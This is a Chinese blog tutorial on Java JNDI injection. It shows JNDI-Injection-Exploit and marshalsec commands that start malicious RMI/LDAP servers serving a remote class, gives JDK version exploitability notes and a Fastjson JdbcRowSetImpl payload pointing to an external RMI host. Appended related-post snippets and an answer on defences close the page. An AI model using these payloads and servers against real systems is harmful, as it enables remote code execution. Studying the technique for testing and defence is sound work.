Java安全—JNDI注入&RMI服务&LDAP服务&JDK绕过

最新推荐文章于 2025-04-16 10:22:24 发布
最新推荐文章于 2025-04-16 10:22:24 发布
阅读量1.5k 收藏 19
点赞数 7
分类专栏: Java安全 文章标签: java 安全 JNDI注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_76227305/article/details/143937487
版权

前言

上次讲到JNDI注入这个玩意,但是没有细讲,现在就给它详细地讲个明白。

JNDI注入

那什么是JNDI注入呢,JNDI全称为 Java Naming and Directory Interface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源,NDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。
RMI:远程方法调用注册表
LDAP:轻量级目录访问协议

我说白了JNDI其实就是一个接口,可以通过这个接口去调用一些远程服务。

先新建一个项目叫JNDI-demo。

JavaEE建议选择8。

接着新建一个类叫JNDIdemo。

写入以下的代码,当Java想要远程调用一个对象的时候,可以用javax.naming.InitialContext这个类的lookup方法来调用,这个调用支持Rmi和Ldap协议。

package com.sf.maven.jndidemo;
import javax.naming.InitialContext;
import javax.naming.NamingException;
public class JNDIdemo {
    public static void main(String[] args) throws NamingException {
        //创建rmi、ldap服务
        InitialContext ic = new InitialContext();
        //调用服务
        ic.lookup("");
    }
}

JNDI-Injection-Exploit

我们先创建一个rmi服务,还是利用JNDI-Injection-Exploit这个工具,命令就是弹出一个计算机。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A 8.xxx.xxx。xxx

代码填入我们的链接,直接运行代码可以看到弹出计算机。

marshalsec-0.0.3-SNAPSHOT

就相当于我本地电脑通过rmi去请求一个远程的class文件,并且执行里面的代码。如果我们换一个工具来搞的话效果会更直观,我们先新建一个名为Test的Java文件。

写入以下的代码,就是一个命令执行,弹出计算机。

来到Test的目录下面,把它编译成.class文件。

javac .\Test.java

把这个class文件放到web目录上面,或者你开个临时http服务也行。

python -m http.server 8080

现在利用marshalsec-0.0.3-SNAPSHOT-all.jar这个工具来生成调用链接,这个就没有JNDI-Injection-Exploit那么方便,要像上面那样自己编写class文件,不会根据命令给你自动生成。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0/#Test      //启动LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://0.0.0.0/#Test      //启动RMI服务

可以看到会生成一个端口连接。

使用远程调用。

lookup(“ldap://xx.xx.xx.xx:1389/Test”)

lookup(“rmi://xx.xx.xx.xx:1099/Test”)

妈的不知道为啥一直弹不了计算机出来,但是RMI服务和http服务是显示有连接的,你妹的。

而且我java版本都是在1.8.0_112的啊。

崩溃啦,有无了解的师傅可以指点一二。

哎,接着我们来看看不同版本JDK或者不同的工具,是否都能调用JDK和RMI,过程就是不断换JDK版本去测试就行了,具体我就不演示了,直接给给过吧。

PS:8U112相当于1.8.0_112,其它的也是同理。

RMI marshalsec工具
JDK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

RMI jndi-inject工具
JDK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

LDAP  - marshalsec工具
JDK 17
11版本
8u362
8U112 都可以

LDAP  - jndi-inject工具
DK 17版本 无法调用
11版本无法调用
8u362 无法执行
8U112 可以

这里网上搞的包浆图,可以看到不同的java版本所能调用的协议也是不同的。

或者你用其它的类也能达到JNDI注入。

黑盒测试

那我们怎样去知道有无JNDI注入这个漏洞呢,我们可以通过发送错误数据去判断,这里发送个错误的json数据,然后报错中返回了fastjson,说明可能存在JNDI注入,然后利用DNSlog验证一下即可。

POC编写

假如我们知道有fastjson这个漏洞,该如何编写poc呢,上次我们演示fastjson的时候是自己写一个类com.wlwznb.user。

但是实战中我们不可能自己去写一个,得用java自带的,所以我们要指定com.sun.rowset.JdbcRowSetImpl这个类,但是上面我们说是通过javax.naming.InitialContext.lookup()这个方法来实现远程调用的,那为啥不指定这个。

其实是com.sun.rowset.JdbcRowSetImpl这个类里面自带了InitialContext.lookup()方法,由上面图片可见。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://47.94.236.117:1099/wktunx","autoCommit":true}

总结

说实话JNDI对于不熟悉java的同学来说还是挺牢的,毕竟涉及了很多java开发的东西。

最后还是要声明一下,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

参考文章:

https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html

https://blog.youkuaiyun.com/wushangyu32335/article/details/136131244

https://www.mi1k7ea.com/2020/09/07/%E6%B5%85%E6%9E%90%E9%AB%98%E4%BD%8E%E7%89%88JDK%E4%B8%8B%E7%9A%84JNDI%E6%B3%A8%E5%85%A5%E5%8F%8A%E7%BB%95%E8%BF%87/

Java代码审计】JNDI注入
大河之犬的博客
03-07 4279
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDIJava EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAPRMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
Java代码审计】JNDI+RMI绕过高版本JDK的限制
大河之犬的博客
03-08 1163
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
marshalsec java反序列化利用工具
最新发布
M1665487923的博客
04-16 1272
通过模拟恶意服务(如 RMILDAP 和 HTTP)和生成特定序列化 payload,帮助研究人员验证漏洞并实现远程代码执行(RCE)。其核心功能包括: JNDI 注入模拟:通过构造恶意 JNDI 链接(如 rmi://IP:PORT/Object),触发目标系统加载远程恶意类; 多协议支持:兼容 RMILDAP 等协议,可托管恶意类文件并响应攻击请求; Payload 生成:支持 Hessian、Jackson 等序列化库的 payload 生成,覆盖广泛漏洞场景。
JNDI访问LDAP
03-29
NULL 博文链接:https://zzqrj.iteye.com/blog/1279219
JNDILDAP(1)
懒散狂徒的专栏
07-31 2347
 6.1  什么是JNDI在一个企业中,命名服务为读者的应用程序在网络上定位对象提供了一种方法。一个命名服务将对象和名称联系在了一起,并且可以通过它们指定的名称找到相应的对象。JNDIJava命名和目录接口,是一个为Java应用程序提供命名服务的应用程序编程接口(API)。它为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口,类似于JDBC都是构建在抽象层上。要使用JND
LdapJNDI
niu870781892的专栏
06-07 3362
Ldap基础知识 应用服务器网络协议网络应用数据结构企业应用  什么是JNDI 在一个企业中,命名服务为读者的应用程序在网络上定位对象提供了一种方法。一个命名服务将对象和名称联系在了一起,并且可以通过它们指定的名称找到相应的对象。 JNDIJava命名和目录接口,是一个为Java应用程序提供命名服务的应用程序编程接口(API)。它为开发人员提供了查找和访问各种命名和目录服务
JNDI注入-ldap绕过
07-30 605
传入var4参数,var4在下图中可以看到是在LDAP中查到的一些属性。下面if语句就是判断,拿到的是什么类型,选择相应的方法去decode。我jdk版本是8u141,可以看到这里也是做了trustURLCodebase的系统限制,不能远程加载类。注意这里又跳到DirectoryManager里面去了,和RMI一样攻击点是不在JNDI的文件中的。我弹计算器代码是写在静态代码块儿中的所以在初始化的时候就弹了计算器。这里面调用到了1中的两个方法,也是没有攻击点的。写在构造函数中的会在下面实例化的时候弹计算器。
java jndi ldap,使用JNDI进行LDAP身份验证
weixin_33603681的博客
02-16 1094
I'd like to test if a given user and password of a LDAP user are correct.I sorted out that jndi is the library to use.I found this simple class:package myldap;import java.util.Hashtable;import javax.n...
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1766
JNDI JNDIjava Naming and Directory Interfac即java命名目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDIJava EE的重要部分,,JNDI可访问的现有的目录及服务有:JDBC、LDAPRMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9768
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务LDAP(Lightweight Dir
绕过高版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1908
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
基于JavaJNDILDAP Demo
05-24
基于Java JNDI 操纵LDAP的基础实现,包括LDAP连接相关生命周期,认证的两种策略demo,条目的操作,schema的基础操作包括(attributeDefinition\objectDefinition\)但未包含相关syntaxDefinition的操纵. 没有资源分的朋友可给我发邮件ybygjy#gmail.com
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI注入JNDI注入Bypass
weixin_45032957的博客
06-09 398
看这个图,就感觉很清晰. 测试ldap攻击:jdk版本选择:jdk8u73 ,测试环境Mac OS jdk8系列各个版本下载大全:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 恶意类:Exploit.java: 复制代码 import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFact
java jndi ldap_JNDI LDAP
weixin_29560137的博客
02-13 411
对于众多接口服务、协议、互联网名称,总会遇到感到熟悉,但是时间一长就会忘记,所以还是要自己整理一下,加强记忆,当然最好的方式还是动手实践。JNDI :全称:JAVA NAMING AND Directory interface解释:java 命名目录访问接口:java命名服务和目录服务而提供的统一API。理解:通过命名来访问需要的资源,类似DNS服务,可通过 key-value的形式。LDAP ...
浅析JNDI注入Bypass
weixin_30247307的博客
06-21 143
之前在Veracode的这篇博客中https://www.veracode.com/blog/research/exploiting-jndi-injections-java看到对于JDK 1.8.0_191以上版本JNDI注入绕过利用思路,简单分析了下绕过的具体实现,btw也记录下自己的一些想法,本文主要讨论基于Reference对象的利用。 The Past JDK版本:1.8.0...
Java JNDILDAP数据库的访问
pony的专栏
10-09 627
import java.util.Hashtable;    import javax.naming.Context;  import javax.naming.NamingEnumeration;  import javax.naming.NamingException;  import javax.naming.directory.Attribute;  import javax.naming.directory.Attributes;  import javax.naming.directory.Se
java jndi ldap_java操作jndi ldap的例子代码
weixin_33783283的博客
02-13 364
1.[代码][Java]代码import java.util.Hashtable;import javax.naming.Context;import javax.naming.InitialContext;import javax.naming.NamingException;import javax.naming.ldap.LdapName;/*** Demonstrates how to p...
常用JNDI服务提供者连接工厂
liaomin416100569的专栏
03-22 1503
调用ejb时,如果客户端和ejb不在同一个jvm,就要设置InitialContext,不同的应用服务器InitialContext写法也不同. Context.INITIAL_CONTEXT_FACTORY:指定到目录服务的连接工厂 Context.PROVIDER_URL:目录服务提供者URL //jboss: Java代码 Context.INITIAL_CONTEXT_FACTORY, "
发现服务器进程加载了未知的 JNDI 动态类可能是什么攻击
04-01
<think>好的,用户想了解服务器进程加载未知JNDI动态类涉及的安全攻击类型及防护方法。首先,我需要回忆JNDI相关的安全风险,特别是近年来常见的攻击方式,比如Log4j漏洞中的JNDI注入JNDI作为Java命名和目录接口,如果加载了未知的动态类,可能导致远程代码执行,这是非常危险的。 接下来,我需要明确攻击类型。可能的攻击类型包括JNDI注入攻击、远程类加载、LDAP/RMI协议滥用等。比如攻击者通过构造恶意JNDI链接,诱导服务器访问恶意的LDAP服务器,从而加载并执行恶意类。 然后是防御措施,这部分需要结合现有的安全建议。比如限制JNDI的协议使用,禁止远程代码加载,升级JDK版本,因为高版本JDK默认限制了远程类加载。同时,使用安全管理器,配置白名单,以及对日志中的异常JNDI请求进行监控。 还要考虑引用用户提供的资料,里面提到了反序列化漏洞的防护,比如使用安全的库如Jackson和Gson,这可能JNDI攻击的防护有部分重叠,但需要明确区分。另外,检查系统进程和网络流量也是排查方法之一,可以引用这些作为防御措施的一部分。 需要确保回答结构清晰,分点列出攻击类型和对应的防护方法。同时,用户可能需要具体的示例或配置建议,比如如何配置JVM参数来禁用远程类加载,或者如何在代码中限制JNDI的查找来源。 最后,生成相关问题时要围绕JNDI攻击的扩展,比如具体案例、排查步骤、其他漏洞的关系等,帮助用户深入理解。</think>### 服务器进程加载未知JNDI动态类的安全风险防御措施 #### 一、安全攻击类型 1. **JNDI注入攻击** 攻击者通过构造恶意字符串(如$\text{ldap://attacker.com/Exploit}$)注入JNDI查找接口中,诱导服务器访问恶意目录服务并加载远程类,触发远程代码执行(RCE)[^1][^3]。例如Log4j漏洞(CVE-2021-44228)即利用此机制。 2. **远程类加载漏洞** 当JNDI客户端未验证来源时,可能从不受信任的LDAP/RMI服务器动态加载恶意类文件(如$\text{Exploit.class}$),导致攻击者通过类初始化方法执行任意命令[^1]。 3. **协议滥用攻击** 利用JNDI支持的RMILDAP、CORBA等协议进行中间人攻击或协议漏洞利用,例如通过RMI绑定恶意对象实现反序列化攻击[^2][^3]。 #### 二、防御措施 1. **环境配置加固** - **禁用高危协议**:在JVM启动参数中添加$\text{-Dcom.sun.jndi.ldap.object.trustURLCodebase=false}$,禁止从远程URL加载类文件 - **升级JDK版本**:JDK 6u211/7u201/8u191及以上版本默认禁用LDAP远程类加载 - **限制JNDI查找范围**:通过安全策略文件限制代码库路径,如$\text{java.security.policy}$ 2. **代码层防护** ```java // 使用白名单机制验证JNDI名称 if (!name.startsWith("java:/comp/env")) { throw new InvalidJndiNameException(); } ``` - 替换危险API:避免直接使用$\text{InitialContext.lookup()}$处理外部输入 - 启用安全管理器:配置$\text{java.policy}$文件限制敏感操作权限[^2] 3. **运行时监控** - 使用Wireshark监控LDAP/RMI协议流量,检测异常JNDI请求(如包含$\text{\$}\{\text{jndi:}\}$格式的日志条目) - 定期检查服务器进程加载的类文件,使用工具(如Arthas)分析JVM类加载情况 4. **依赖库管理** - 升级Log4j至2.17.0+、Fastjson至1.2.83+等修复已知漏洞的版本 - 使用安全序列化库(如Jackson)替代Java原生序列化 #### 三、应急响应流程 1. 立即隔离受攻击服务器 2. 使用内存分析工具(MAT)检查JVM中可疑的类实例 3. 检索日志中$\text{jndi:ldap}$等关键词,定位攻击入口 4. 更新所有涉及JNDI的组件补丁
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值